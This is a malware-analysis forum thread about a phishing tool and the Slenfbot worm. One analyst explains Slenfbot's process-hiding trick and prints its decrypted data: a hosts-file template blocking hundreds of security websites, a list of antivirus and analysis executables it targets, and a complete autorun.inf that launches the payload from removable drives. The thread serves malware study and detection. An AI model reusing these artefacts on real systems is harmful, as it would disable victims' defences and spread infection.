A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #15610  by Flamef
 Sun Sep 16, 2012 1:26 pm
A while ago,i wrote some sort of article regarding league of legends themed scams,it's publshed @ MalwareDisasters and can be read here :
http://malwaredisasters.blogspot.gr/201 ... ttack.html
Funny how a kid can make his own phising tool and start spreading havoc :D
https://www.virustotal.com/file/77186a0 ... /analysis/
Thanks Xylitol for the sample.
Attachments
 #19499  by thisisu
 Fri May 31, 2013 12:45 am
I think this belongs here, sorry if should be in its own topic.

https://www.virustotal.com/en/file/d761 ... 369960479/

MD5: ff273462480a65f7601809af5a0378d1

http://www.microsoft.com/security/porta ... 2fSlenfbot

Was on the same machine that also had Palevo/Lime
Attachments
Slenfbot.jpg
Slenfbot.jpg (7.31 KiB) Viewed 356 times
pass: infected
(68.36 KiB) Downloaded 54 times
 #19506  by EP_X0FF
 Fri May 31, 2013 4:37 am
thisisu wrote:I think this belongs here, sorry if should be in its own topic.

https://www.virustotal.com/en/file/d761 ... 369960479/

MD5: ff273462480a65f7601809af5a0378d1

http://www.microsoft.com/security/porta ... 2fSlenfbot

Was on the same machine that also had Palevo/Lime
Well, it is old C++ autorunner with AV blacklist and hosts data file modification. However it has a small interesting feature (only works on XP and 2003 RTM). It hides its own process from process list by patching EPROCESS ActiveProcessLinks with NtSystemDebugControl calls.

Image

In attach decrypted bot.

https://www.virustotal.com/en/file/adb7 ... /analysis/

WWW blacklist
Code: Select all
127.0.0.1	%s
   
   www.securitynewsportal.com  www.emsisoft.de foros.toxico-pc.com housecall.trendmicro.com    www.bitdefender.es  www.infospyware.com www.commentcamarche.net www.malwarebytes.org    alerta-antivirus.red.es foros.zonavirus.com bbs.winzheng.com    support.f-secure.com    bbs.taisha.org  bbs.kpfans.com  bbs.kafan.com   bbs.kafan.cn    downloads.malwarebytes.org  es.mcafee.com   www.cfan.com.cn bbs.cfan.com.cn www.ikaka.cn    www.ikaka.com   software-files.download.com zhidao.ikaka.com    www.eset-la.com bbs.ikaka.com   file.ikaka.cn   file.ikaka.com  www.javacoolsoftware.com    msncleaner.softonic.com www.drweb.com.es    hi.baidu.com    zhidao.baidu.com    www.duba.net    bbs.duba.net    update.360safe.com  update.360safe.cn   updatem.360safe.cn  updatem.360safe.com free.antivirus.com  www.hotshare.net    dl.360safe.com  x.360safe.com   down.360safe.com    down.360safe.cn www.mvps.org    forums.comodo.com   deckard.geekstogo.com   kaba.360.com    kaba.360.cn baike.360.com   baike.360.cn    www.precisesecurity.com p3dev.taringa.net   www.360.com www.360.cn  codehard.wordpress.com  www.360safe.com www.360safe.cn  www.funkytoad.com   acs.pandasoftware.com   www.bleedingthreats.net www.net-security.org    www.usbcleaner.cn   www.infosecpodcast.com  www.dicasweb.com.br 13iii.com   www.techimo.com forum.securitycadets.com    discussions.virtualdr.com   www.computing.net   forum.zazana.com    new.taringa.net www.feedage.com www.cyberdefender.com   es.kioskea.net  secunia.com es.wasalive.com www.thecomputerpitstop.com  www.techspot.com    www.wilderssecurity.com forum.tweaks.com    forums.devshed.com  www.wikio.es    www.experts-exchange.com    www.spyany.com  www.pchell.com  bbs.360safe.com bbs.360safe.cn  forum.clubedohardware.com.br    www.taringa.net www.daniweb.com www.tweaksforgeeks.com  forum.piriform.com  comunidad.wilkinsonpc.com.co    www.soccersuck.com  www.whatthetech.com hjt.networktechs.com    housecall65.trendmicro.com  scanner.virus.org   www.viruschief.com  virscan.org www.tallemu.com espanol.answers.yahoo.com   www.norman.com  www.networkworld.com    www.trucoswindows.es    www.arswp.com   www.ca.com  www.cwsandbox.org   www.clamwin.com www.sandboxie.com   www.securitywonks.net   mx.answers.yahoo.com    www.webphand.com    www.antivirus.about.com www.clamav.net  www.personalfirewall.comodo.com www.freespywareremoval.info www.eradicatespyware.net    www.spywareterminator.com   www.antivirus.comodo.com    pogonyuto.forospanish.com   www.forospyware.es  www.ziggamza.net    www.mxttchina.com   www.spywaredb.com   www.auditmypc.com   www.firewallguide.com   www.vsantivirus.com www.dougknox.com    www.fortiguardcenter.com    www.safer-networking.org    www.fortinet.com    www.trendmicro.com  www.forospanish.com subs.geekstogo.com  www.kaspersky.es    www.castlecops.com  www.forums.majorgeeks.com   bbs.s-sos.net   www.ikarus.net  www.prevx.com   www.antivir.es  www.2-spyware.com   thejokerx.blogspot.com  forospyware.com kr.ahnlab.com   www.free-av.com www.techsupportforum.com    es.answers.yahoo.com    www.pandasecurity.com   www.eset.com    www.avira.com   oldtimer.geekstogo.com  security.symantec.com   www.f-prot.com  www.bitdefender.com www.futurenow.bitdefender.com   www.mozilla-hispano.org www.trucoswindows.net   www.ewido.net   www.onlinescan.avast.com    www.avast.com   www.laneros.com mvps.org    onecare.live.com    www.file.net    down.www.kingsoft.com   www.eeload.com  www.virscan.org www.lavasoft.com    www.yoreparo.com    securitywonks.net   aknow.prevx.com info.prevx.com  downloads.andymanchesta.com www.51nb.com    www.cybertechhelp.com   hijackthis.download3000.com forums.techguy.org  service1.symantec.com   www.daboweb.com samroeng.hi5.com    fixmyim.com www.cisrt.org   www.msnvirusremoval.com www.guiadohardware.net  boardreader.com www.grisoft.com www.offensivecomputing.net  www.avpclub.ddns.info   community.thaiware.com  www.sunbeltsecurity.com espanol.groups.yahoo.com    www.changedetection.com www.ozzu.com    www.thetechguide.com    www.pcguide.com download.sysinternals.com   www.rolandovera.com www.linhadefensiva.org  www.clubic.com  www.smokey-services.eu  forums.maddoktor2.com   www.geekstogo.com   www.spychecker.com  blogs.icerocket.com www.utilidades-utiles.com   forum.hardware.fr   www.infos-du-net.com    files.filefont.com  www.final4ever.com  www.thinkpad.cn atazita.blogspot.com    www.pcentraide.com  changelog.fr    www.raymond.cc  upload.changelog.fr www.blogschapines.com   www.housecall.trendmicro.com    andymanchesta.com   www.superdicas.com.br   www.trendsecure.com www.runscanner.net  www.babooforum.com.br   www.rising.com  www.rising.com.cn   mailcenter.rising.com   mailcenter.rising.com.cn    www.psicofxp.com    www.configurarequipos.com   blog.hispasec.com   www.threatexpert.com    blog.threatfire.com www.siteadvisor.com www.leforo.com  www.manuelruvalcaba.com www.forospyware.com secubox.aldria.com  www.pantip.com  hjt-data.trend-braintree.com    forums.cnet.com www.malwareremoval.com  www.download.f-secure.com   www.virusspy.com    guru5.grisoft.cz    guru4.grisoft.cz    www.softonic.com    it.answers.yahoo.com    guru3.grisoft.cz    guru2.grisoft.cz    guru1.grisoft.cz    download.microsoft.comguru0.grisoft.cz  ftp.drweb.com   ladooscuro.es   www.tecno-soft.com  mast.mcafee.com download.mcafee.com www.mcafee.com  foro.el-hacker.com  www.box.net update.symantec.com customer.symantec.com   liveupdate.symantec.com liveupdate.symantecliveupdate.com   stdio-labs.blogspot.com ad-aware-se.uptodown.com    www.kztechs.com www.symantec.com    www.analysis.seclab.tuwien.ac.at    securityresponse.symantec.com   alerta-antivirus.inteco.es  www.free.grisoft.com    www.bleepingcomputer.com    www.kaspersky.com   www.kaspersky-labs.com  www.avg-antivirus.net   www.el-hacker.com   www.sergiwa.com cmmings.cn  linhadefensiva.uol.com.br   www.sophos.com  www.virustotal.com  www.avp.com majorgeeks.com  forum.kaspersky.com www.hijackthis.de   www.viruslist.com   www.spybot.info www.spywareinfo.com www.Merijn.org  www.darkclockers.com    www.bakunos.com wwww.experts-exchange.com   download.nai.com    sosvirus.changelog.fr   www.zonavirus.com   www.free.avg.com    wwww.mcafee.com search.mcafee.com   vil.nail.com    foro.ethek.com  www.personal.psu.edu    www.resplendence.com    www.pcsupportadvisor.com    www.pctools.com www.elhacker.org    ar.answers.yahoo.com    www.greatis.com www.antirootkit.com safecomputing.umn.edu   www.misec.net   www.castlecrops.com espanol.dir.groups.yahoo.com    z-oleg.com  www.sysinternals.com    www.rootkit.nl  diamondcs.com.au    www.chkrootkit.org  dr-web-cureit.softonic.com  avast-home.uptodown.com sophos.com  forum.telecharger.01net.com forum.sysinternals.com  www.247fixes.com    sapcupgrades.com    tech.pantip.com forum.malekal.com   www.cddchiangmai.net    www.krupunmai.com   www.mostz.com   www.huaifai.go.th   avg.vo.llnwd.net    forum.hijackthis.de forums.whatthetech.com  cit.kookmin.ac.kr   v.dreamwiz.com  ntfaq.co.kr www.superuser.co.kr guru.avg.com    www.elitepvpers.de  www.virusdoctor.jp  research.sunbelt-software.com   lexikon.ikarus.at   lurker.clamav.net   www.nabble.com  foro.noticias3d.com www.dazhizhu.cn virusinfo.prevx.com msnfix.changelog.fr foro.elhacker.net   www.f-secure.com    foros.softonic.com  download.bleepingcomputer.com   www.incodesolutions.com www.rootkit.com
Security software blacklist
Code: Select all
VIPRE.EXE   ISSDM_EN_32.EXE P08PROMO.EXE    K7TS_SETUP.EXE  AVINSTALL.EXE   WITSETUP.EXE    TrendMicro_TISPro_16.1_1063_x32.EXE VBA32-PERSONAL-LATEST-ENGLISH.EXE   FSMB32.EXE  FSGK32.EXE  FSAV95.EXE  FSAV530WTBYB.EXE    FSAV530STBYB.EXE    FSAV32.EXE  FSAV.EXE    FSAA.EXE    FPROT.EXE   FP-WIN.EXE  FNRB32.EXE  FIH32.EXE   FCH32.EXE   FAST.EXE    FAMEH32.EXE F-STOPW.EXE F-PROT95.EXE    F-PROT.EXE  AFMAIN.EXE  SPIDERUI.EXE    SPIDERNT.EXE    ALERTMAN.EXE    RAVMOND.EXE MAKEREPORT.EXE  BOXMOD.EXE  360SAFE.EXE 360RPT.EXE  360HOTFIX.EXE   360TRAY.EXE NSVMON.NPC  NSAVSVC.NPC NPCGREENAGENT.NPC   PUSCAN.EXE  AYSERVICENT.AYE AYAGENT.AYE CMDAGENT.EXE    CPF.EXE VSMON.EXE   ZLCLIENT.EXE    NSUTILITY.EXE   NSPUPDT.EXE NAVQSCAN.EXE    NSPMAIN.EXE NSPUPSVC.EXE    NSPSVC.EXE  MKSADMINCONSOLE.EXE MKSUPDATE.EXE   MKSPC.EXE   MKSFWALL.EXE    MKSVIRMONSVC.EXE    MKS_SCAN.EXE    MKS_MAIL.EXE    MKSREGMON.EXE   KAVPFW.EXE  KASMAIN.EXE KAV32.EXE   KPFWSVC.EXE KISSVC.EXE  KWATCH.EXE  KPFW32.EXE  KAVSTART.EXE    KVSRVXP.EXE KVOL.EXE    KVXP.KXP    KVMONXP.KXP CAVASM.EXE  CMAIN.EXE   ARCABIT.CORE.LOGGINGSERVICE.EXE ARCABIT.CORE.CONFIGURATOR2.EXE  TASKSCHEDULER.EXE   UPDATE.EXE  NETMONSV.EXE    FILEMONSV.EXE   ABREGMON.EXE.EXE    ARCACHECK.EXE   ARCAVIR.EXE AVMENU.EXE  A2HIJACKFREE.EXE    A2SERVICE.EXE   A2START.EXE A2SCAN.EXE  A2GUARD.EXE VRFWSVC.EXE HFACSVC.EXE VRMONSVC.EXE    HPCSVC.EXE  HSVCMOD.EXE VRMONNT.EXE VBA32ADS.EXE    VBA32LDR.EXE    FILELOCKSETUP.EXE   TSCFCOMMANDER.EXE   TMPROXY.EXE TMPFW.EXE   TMBMSRV.EXE UFNAVI.EXE  UFSEAGNT.EXE    MKSTRAY.EXE TISSPWIZ.EXE    SFCTLCOM.EXE    TNBUTIL.EXE DEFWATCH.EXE    RTVSCAN.EXE SBAMSVC.EXE SBAMUI.EXE  SBAMTRAY.EXE    SAVADMINSERVICE.EXE SAVSERVICE.EXE  SCFSERVICE.EXE  SCFMANAGER.EXE  RAVTASK.EXE CCENTER.EXE ULIBCFG.EXE RAVLITE.EXE PCTAV.EXEPCTAVSVC.EXEPXCONSOLE.EXEPXAGENT.EXERAV.EXE    PCTSAUXS.EXE    PCTSTRAY.EXE    PCTSSVC.EXE PCTSGUI.EXE AVGAS.EXE   PAVBCKPT.EXE    WEBPROXY.EXE    PAVSRV51.EXESRVLOAD.EXE PSIMSVC.EXE PSHOST.EXE  AVENGINE.EXE    PSKMSSVC.EXE    PAVPRSRV.EXE    PAVFNSVR.EXE    PSCTRLS.EXE TPSRV.EXE   NOD32M2.EXE NOD32CC.EXE NOD32.EXE   NMAIN.EXE   NOD32KUI.EXE    MSASCUI.EXE MSMPENG.EXE MCUPDATE.EXE    MCSHIELD.EXE    MCVSSHLD.EXE    MCVSRTE.EXE MCAGENT.EXE KAVSVC.EXE  KAV.EXE K7TSMNGR.EXE    K7SPMSRC.EXE    K7RTSCAN.EXE    K7PSSRVC.EXE    K7FWSRVC.EXE    K7EMLPXY.EXE    K7TSECURITY.EXE K7SYSTRY.EXE    VIRUSUTILITIES.EXE  GUARDXSERVICE.EXE   GUARDXKICKOFF.EXE   AVKWCTL.EXE AVKTUNERSERVICE.EXE AVKSERVICE.EXE  GDFWSVC.EXE AVKPROXY.EXE    GDFIRE~1.EXE    AVKTRAY.EXE GDFIREWALLTRAY.EXE  FSAUA.EXE   FSDFWD.EXE  FSGK32ST.EXE    FSM32.EXE   FPWIN.EXE   FPAVSERVER.EXE  FPROTTRAY.EXE   INICIO.EXE  NOD32KRN.EXE    FSMA32.EXE  APVXDWIN.EXE    UMXPOL.EXE  UMXFWHLP.EXE    UMXAGENT.EXE    UMXCFG.EXE  PPCLTPRIV.EXE   SVCPRS32.EXE    ITMRTSVC.EXE    CCPROVSP.EXE    MDMCLS32.EXE    CAGLOBALLIGHT.EXE   CAPFUPGRADE.EXE CAPFASEM.EXE    CAFW.EXE    CFGMNG32.EXE    CCTRAY.EXE  CLAMTRAY.EXE    CLAMWIN.EXE ALSVC.EXE   ALMON.EXE   DRWEBSCD.EXE    SPIDERML.EXE    DRWEB32W.EXE    ACS.EXE STRTSVC.EXE OP_MON.EXE  SENSOR.EXE  QHFW332.EXE CATEYE.EXE  ONLNSVC.EXE EMLPROUI.EXE    UPSCHD.EXE  SCANMSG.EXE SCANWSCS.EXE    EMLPROXY.EXE    ONLINENT.EXE    ASWCLNR.EXE BDAGENT.EXE VSSERV.EXE  LIVESRV.EXE XCOMMSVR.EXE    UISCAN.EXE  BDSS.EXE    AVGCMGR.EXE AVGWSRV.EXE AVGUI.EXE   AVGSCANX.EXE    AVGUPSVC.EXE    AVGAMSVR.EXE    AVGUPD.EXE  AVGTRAY.EXE AVGFRW.EXE  AVGEMC.EXE  AVGNSX.EXE  AVGRSX.EXE  AVGWDSVC.EXE    ASHWEBSV.EXE    ASHMAISV.EXE    ASWUPDSV.EXE    ASHSERV.EXE ASHDISP.EXE AVCENTER.EXE    SCHED.EXE   AVIRARKD.EXE    AVGNT.EXE   AVGUARD.EXE AHNSDSV.EXE ACAIS.EXE   ACALS.EXE   ACAEGMGR.EXE    QOELOADER.EXE   ACAAS.EXE   QUHLPSVC.EXE    AVGCSRVX.EXE    123.EXE RAVP.EXEMBAM.EXE123.COM UNIEXTRACT.EXE  SYSANALYZER_SETUP.EXE   STARTDRECK.EXE  SPF.EXE REGX2.EXE   REGSHOT.EXE REGSCANNER.EXE  REGISTRAR_LITE.EXE  REGCOOL.EXE REGALYZ.EXE PROJECTWHOISINSTALLER.EXE   PROCMON.EXE CUREIT.EXE  FIXBAGLE.EXE    PGSETUP.EXE OBJMONSETUP.EXE NETALYZ.EXE KILLBOX.EXE INSTALLWATCHPRO25.EXE   AVENGER.EXE IEFIX.EXE   HOSTSFILEREADER.EXE FIXPATH.EXE FILEFIND.EXE    FILEALYZ.EXE    EULALYZERSETUP.EXE  A2HIJACKFREESETUP.EXE   DLLCOMPARE.EXE  CPROCESS.EXE    CPORTS.EXE  ASVIEWER.EXE    APT.EXE APM.EXE WIRESHARK.EXE   SPYBOTSD.EXE    TEATIMER.EXE    SPYBOTSD160.EXE PROCESSMONITOR.EXE  PROCDUMP.EXE    PG2.EXE LORDPE.EXE  ICESWORD.EXE    REANIMATOR.EXE  ROOTKITNO.EXE   RKD.EXE HACKMON.EXE UNHACKME.EXE    ROOTKIT_DETECTIVE.EXE   AVGARKT.EXE FSB.EXE FSBL.EXE    ROOTKITREVEALER.EXE PSKILL.EXE  TASKMON.EXE TASKLIST.EXE    TASKMAN.EXE PROCEXP.EXE MSNFIX.EXE  HIJACKTHIS_V2.EXE   HIJACKTHIS.EXE  HIJACKTHIS_SFX.EXE  HJTSETUP.EXE    HJTINSTALL.EXE  OLLYDBG.EXE NETSTAT.EXE PORTMONITOR.EXE PORTDETECTIVE.EXE   FPORT.EXE   APORTS.EXE  PAVARK.EXE  DARKSPY105.EXE  HELIOS.EXE  ROOTKITBUSTER.EXE   ROOTALYZER.EXE  BC5CA6A.EXE SEEM.EXE    DELAYDELFILE.EXE    DUBATOOL_AV_KILLER.EXE  SUPERKILLER.EXE KAKASETUPV6.EXE BUSCAREG.EXE    MSNCLEANER.EXE  SRESTORE.EXE    BOOTSAFE.EXE    SUPERANTISPYWARE.EXE    REGUNLOCKER.EXETSNTEVAL.EXEXP_TASKMGRENAB.EXE   CF9409.EXE  GMER.EXE    CATCHME.EXE SDFIX.EXE   COMBOFIX.EXE    SRENGPS.EXE AUTORUNS.EXE    TASKKILL.EXE    REG.EXE MYPHOTOKILLER.EXE   KILLAUTOPLUS.EXE    FOLDERCURE.EXE  REGEDIT.SCR REGEDIT.COM TCPVIEW.EXE LISTO.EXE   GUARD.EXE   NTVDM.EXE   COMMAND.COM COMBOFIX.COM    COMBOFIX.SCR    COMOBO-FIX.EXE  COMBOFIX.BAT    COMBO-FIX.EXE   REGMON.EXE  OTMOVEIT.EXEMBAM-SETUP.EXE  JAJA.EXE    AVZ.EXE MBAM.EXE    MBAM-SETUP.EXE  PENCLEAN.EXE    ELISTA.EXE  HJ.EXE  WINDOWS-KB890930-V2.2.EXE   MRTSTUB.EXE MRT.EXE HIJACK-THIS.EXE VIRUS.EXE   SAFEBOOTKEYREPAIR.EXEOTMOVEIT3.EXEHOSTSXPERT.EXEDAFT.EXE    ATF-CLEANER.EXE COMPAQ_PROPIETARIO.EXE  REGUNLOCKER.EXE UNLOCKERASSISTANT.EXE   UNLOCKER.EXE    SRENGLDR.EXE    HOOKANLZ.EXE    UNLOCKER1.8.7.EXE
Autorunner
Code: Select all
\autorun.inf    
[aUTOrUN] 
useautoplay=1 
;?ВX?лтсLLЭмIL?Н?Г?   
sHELL\\explore\\\command=cmd /c start "" "CACHE-19204730\comd.sys"    
;ЭмIL?Н?Г??ВX?лтсLL   
sHELL\\open\\\command=cmd /c start "" "CACHE-19204730\comd.sys"   
;OOмБГ?D  
action=Open folder to view files using Windows Explorer   
н?ИГТv    
icon=%SystemRoot%\system32\SHELL32.dll,4  
;??Cd 
open=cmd /c start "" "CACHE-19204730\comd.sys"    
:nop
;M?Ц???В    
Attachments
pass: infected
(35.13 KiB) Downloaded 54 times